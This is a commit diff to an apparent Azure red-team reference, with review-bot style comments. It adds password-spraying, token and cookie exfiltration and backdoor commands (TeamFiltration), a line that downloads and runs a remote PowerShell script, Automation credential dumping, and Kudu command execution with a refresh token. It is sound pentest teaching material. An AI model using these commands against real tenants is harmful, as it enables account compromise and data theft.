Azure - Pages v0.1

pull/2/head
Swissky 2024-01-03 15:40:20 +01:00
parent bd1fe1e16b
commit 57e99121dc
8 changed files with 172 additions and 3 deletions

View File

@ -50,6 +50,7 @@ PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password"
## Federation ## Federation
* [Golden SAML](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adfs-federation-services/)
## AD Connect - Credentials ## AD Connect - Credentials

View File

@ -142,6 +142,21 @@ Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlock
## Service Principals ## Service Principals
```ps1
PS C:\> Get-AzureADServicePrincipal
ObjectId AppId DisplayName
-------- ----- -----------
00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App
012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise
06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement
092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports
0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS
0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService
0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service
0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics</dev:code>
```
## Other ## Other
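Review bot: the last row of the added sample output ends with a stray `</dev:code>` tag after "Microsoft Power BI Reporting and Analytics", which looks like markup left over from where the output was copied; remove it so the row matches the others. A one-line description above the block saying what the listing is used for would also help, since the section currently has only the command and its output.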

View File

@ -44,6 +44,18 @@
PS C:> Get-AzureInTuneScript PS C:> Get-AzureInTuneScript
PS C:> Show-AzureKeyVaultContent -All PS C:> Show-AzureKeyVaultContent -All
``` ```
* [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
```ps1
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects * [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud. * [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
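Review bot: in the added TeamFiltration block the paths given to `--cookie-dump` and `--tokens` use doubled backslashes (`C:\\CookieData.txt`, `C:\\OutputTokens.txt`) while every `--outpath` and `--usernames` path uses single ones; pick one form, since the fence is tagged `ps1`, where a backslash needs no escaping. The `--usernames` path also points at `C:\Clients\2021\...` while the output goes to `C:\Clients\2023\...`, which reads like a copy-paste leftover.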
@ -112,6 +124,12 @@ The default lockout policy tolerates 10 failed attempts, then lock out an accoun
```powershell ```powershell
o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com
``` ```
* [Flangvik/TeamFiltration](https://github.com/Flangvik/TeamFiltration)
```powershell
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
```
## Azure Services Enumeration ## Azure Services Enumeration

View File

@ -15,6 +15,7 @@
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>' PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
``` ```
## Add Service Principal ## Add Service Principal
* Generate a new service principal password/secret * Generate a new service principal password/secret
@ -32,6 +33,13 @@
``` ```
## Add User to Group
```ps1
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
```
## References ## References
* [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) * [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)

View File

@ -0,0 +1,53 @@
# Azure Services - Container Registry
## Enumerate
List container registries in the subscription using Azure CLI
```ps1
az login -u user@domain.onmicrosoft.com -p pass
az acr list -o table
```
Login to the Registry
```ps1
acr=<ACRName> # from the previous command
server=$(az acr login -n $acr --expose-token --query loginServer -o tsv)
token=$(az acr login -n $acr --expose-token --query accessToken -o tsv)
docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token
```
List the images in the ACR
```ps1
az acr repository list -n $acr
```
List version tags for an image
```ps1
az acr repository show-tags -n $acr --repository mywebapp
```
Connect to the container registry from a PowerShell console, set the $server and $token variables, and pull the image from the registry
```ps1
# docker login ${registryURI} --username ${username} --password ${password}
$token="<AccessToken>"
$server="<LoginServer>"
docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token
docker pull $server/mywebapp:v1
```
List docker containers inside a registry
```ps1
IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1")
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2
Get-AzACR -username ${username} -password ${password} -registry ${registryURI}
```
## References
* [PENTESTING AZURE: RECON TECHNIQUES - April 29, 2022 Stefan Tita](https://securitycafe.ro/2022/04/29/pentesting-azure-recon-techniques/)
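Review bot: the "Login to the Registry" block is fenced as `ps1` but is written in POSIX shell (`acr=<ACRName>`, `server=$(az acr login ...)`), so it fails when pasted into PowerShell, and the later `ps1` blocks then rely on `$acr` from it. Either tag that block `bash` or rewrite the assignments in PowerShell form (`$acr = ...`), as the pull example further down already does for `$token` and `$server`. In the last block, the `Set-ItemProperty` change to `HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main` has no explanation; add a comment saying why it is needed and that it modifies a machine-wide key. The heading "List docker containers inside a registry" would also read better as images, to match "List the images in the ACR" above.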

View File

@ -1,8 +1,16 @@
# Azure Services - Runbook # Azure Services - Runbook and Automation
## Runbook
Runbook must be **SAVED** and **PUBLISHED** before running it. Runbook must be **SAVED** and **PUBLISHED** before running it.
## Create a Runbook ### List the Runbooks
```ps1
Get-AzAutomationAccount | Get-AzAutomationRunbook
```
### Create a Runbook
* Check user right for automation * Check user right for automation
```powershell ```powershell
@ -18,7 +26,27 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
* Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose` * Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose`
## Persistence via Automation accounts ## Automation Account
### List Automation Accounts
Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment.
```ps1
Get-AzAutomationAccount
```
### Get Automation Credentials
```ps1
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationVariable
```
### Persistence via Automation Accounts
* Create a new Automation Account * Create a new Automation Account
* "Create Azure Run As account": Yes * "Create Azure Run As account": Yes
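Review bot: the sentence "Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment." sits under "### List Automation Accounts" but describes the service as a whole; move it directly under "## Automation Account". The "### Get Automation Credentials" block also lists connections, certificates and variables, so the heading is narrower than its content and should be widened to match.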
@ -39,6 +67,22 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
``` ```
## Desired State Configuration
### List the DSC
```ps1
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
```
### Export the configuration
```ps1
$DSCName = ${dscToExport}
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -march $DSCName} | Export-AzAutomationDscConfiguration -OutputFolder (get-location) -Debug
```
## References ## References
* []() * []()
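Review bot: `-march` in the export pipeline (`where {$_.name -march $DSCName}`) is not a PowerShell operator and should be `-match`; as written the line fails to parse. `$DSCName = ${dscToExport}` also assigns from a variable that is never set on this page, so a quoted placeholder string would be clearer. The context still shows an empty `* []()` entry under References, which is worth filling or removing in the same change.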

View File

@ -5,6 +5,7 @@
* Data Tables - `*.table.core.windows.net` * Data Tables - `*.table.core.windows.net`
* Queues - `*.queue.core.windows.net` * Queues - `*.queue.core.windows.net`
## Enumerate blobs ## Enumerate blobs
```powershell ```powershell
@ -13,6 +14,7 @@ PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
Found Storage Account - redacted.blob.core.windows.net Found Storage Account - redacted.blob.core.windows.net
``` ```
## List and download blobs ## List and download blobs
```powershell ```powershell
@ -22,6 +24,13 @@ PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -Resou
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
``` ```
Retrieve exposed containers with public access
```ps1
PS Az> (Get-AzStorageAccount | Get-AzStorageContainer).cloudBlobContainer | select Uri,@{n='PublicAccess';e={$_.Properties.PublicAccess}}
```
## SAS URL ## SAS URL
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) * Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
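Review bot: the added text says "Retrieve exposed containers with public access", but the command selects `Uri` and `PublicAccess` for every container without filtering, so private containers are listed too. Either add a `where` on the `PublicAccess` value or reword the sentence to say it lists all containers with their public access level.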

View File

@ -1,8 +1,29 @@
# Azure Services - Web Apps # Azure Services - Web Apps
## List Web App
```ps1
az webapp list
```
## Execute Commands
```ps1
$ARMToken = Get-ARMTokenWithRefreshToken `
-RefreshToken "0.ARwA6WgJJ9X2qk..." `
-TenantID "contoso.onmicrosoft.com"
Invoke-AzureRMWebAppShellCommand `
-KuduURI "https://<webapp>.scm.azurewebsites.net/api/command" `
-Token $ARMToken `
-Command "whoami"
```
## SSH Connection ## SSH Connection
First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode`
```powershell ```powershell
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME> az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
``` ```
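Review bot: the URL in the SSH check, `https://${appName}?app.scm.azurewebsites.net/webssh/host`, has a stray `?app` in the hostname, so everything after the `?` is parsed as a query string and the request does not reach the SCM site; it should follow the `<webapp>.scm.azurewebsites.net` form used in the Kudu URI in the "Execute Commands" block. `Get-ARMTokenWithRefreshToken` and `Invoke-AzureRMWebAppShellCommand` are used without naming the module that provides them, so add that above the block. The inline check also uses `${appName}` while the command below it uses `<APP-SERVICE-NAME>`; use one placeholder style.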